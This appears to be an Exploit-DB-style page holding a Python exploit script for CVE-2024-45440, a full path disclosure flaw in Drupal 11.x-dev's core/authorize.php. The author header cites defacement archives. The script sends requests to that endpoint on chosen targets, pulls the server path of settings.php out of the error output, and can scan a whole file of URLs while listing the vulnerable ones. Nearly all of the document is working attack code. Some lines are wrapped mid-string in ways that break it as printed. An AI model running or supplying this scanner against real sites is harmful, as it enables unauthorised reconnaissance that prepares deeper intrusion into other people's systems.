71bfc9b6c5
3 changes to exploits/shellcodes/ghdb FoxCMS 1.2.5 - Remote Code Execution (RCE) Drupal 11.x-dev - Full Path Disclosure
99 lines
No EOL
3.4 KiB
Python
Executable file
99 lines
No EOL
3.4 KiB
Python
Executable file
#!/usr/bin/env python
|
|
# Exploit Title: Drupal 11.x-dev - Full Path Disclosure
|
|
# Date: 2025-04-16
|
|
# Exploit Author: Milad Karimi (Ex3ptionaL)
|
|
# Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
|
|
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
|
|
# Version: 11.x-dev
|
|
# CVE: CVE-2024-45440
|
|
|
|
# -*- coding:UTF-8 -*-
|
|
import re
|
|
import requests
|
|
def banners():
|
|
cve_id = "CVE-2024-45440"
|
|
description = "Drupal 11.x-dev Full Path Disclosure Vulnerability: " \
|
|
"core/authorize.php allows Full Path Disclosure (even
|
|
when error logging is None) " \
|
|
"if the value of hash_salt is file_get_contents of a file
|
|
that does not exist."
|
|
disclaimer = "This tool is for educational purposes only. Any misuse of
|
|
this information is the responsibility of " \
|
|
"the person utilizing this tool. The author assumes no
|
|
responsibility or liability for any misuse or " \
|
|
"damage caused by this program."
|
|
width = 100
|
|
banner_top_bottom = "=" * width
|
|
banner_middle = f"{cve_id:^{width}}\n\n{description:^{width}}"
|
|
banner =
|
|
f"{banner_top_bottom}\n\n{banner_middle}\n\n{disclaimer}\n\n{banner_top_bottom}"
|
|
|
|
return banner
|
|
def scan_single_url(url=None):
|
|
if url is None:
|
|
print("[+] Input the IP/Domain Example: 127.0.0.1 or 127.0.0.1:8080")
|
|
|
|
url = input("[+] IP/Domain: ")
|
|
if not url.startswith('https://') and not url.startswith('http://'):
|
|
full_url = 'http://' + url + '/core/authorize.php'
|
|
print("[*] Scanning...")
|
|
try:
|
|
headers = {
|
|
"Host": url,
|
|
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64;
|
|
rv:133.0) Gecko/20100101 Firefox/133.0",
|
|
"Accept":
|
|
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
|
|
"Accept-Language":
|
|
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
|
|
}
|
|
response = requests.get(full_url, headers,timeout=10)
|
|
pattern = r'<em class="placeholder">(/.*?settings\.php)'
|
|
matches = re.findall(pattern, response.text)
|
|
# print(response.text)
|
|
if 'settings.php' in response.text:
|
|
print(f"[+] {url} Existed!")
|
|
for match in matches:
|
|
print("[+] The full path is:", match)
|
|
return True
|
|
else:
|
|
print(f"[-] {url} Not Exist!")
|
|
return False
|
|
except TimeoutError:
|
|
print(f"[-] {url} Timeout!")
|
|
except Exception as e:
|
|
print(f"[-] {url} Failed!")
|
|
return False
|
|
def scan_multiple_urls():
|
|
print("[+] Input the path of txt Example: ./url.txt or
|
|
C:\\the\\path\\to\\url.txt")
|
|
url_path = input("[+] Path: ")
|
|
url_list = []
|
|
result_list = []
|
|
try:
|
|
with open(url_path, 'r', encoding='utf-8') as f:
|
|
lines = f.readlines()
|
|
for line in lines:
|
|
url_list.append(line.strip())
|
|
except FileNotFoundError as e:
|
|
print("[-] File Not Found!")
|
|
for url in url_list:
|
|
result = scan_single_url(url)
|
|
if result:
|
|
result_list.append(url)
|
|
print("[+] Successful Target:")
|
|
for result in result_list:
|
|
print(f"[+] {result}")
|
|
def main():
|
|
print(banners())
|
|
print("[1] Scan single url\n[2] Scan multiple urls")
|
|
choice = input("[+] Choose: ")
|
|
if choice == '1':
|
|
scan_single_url()
|
|
elif choice == '2':
|
|
scan_multiple_urls()
|
|
else:
|
|
print("[-] Invalid option selected!")
|
|
pass
|
|
if __name__ == '__main__':
|
|
main() |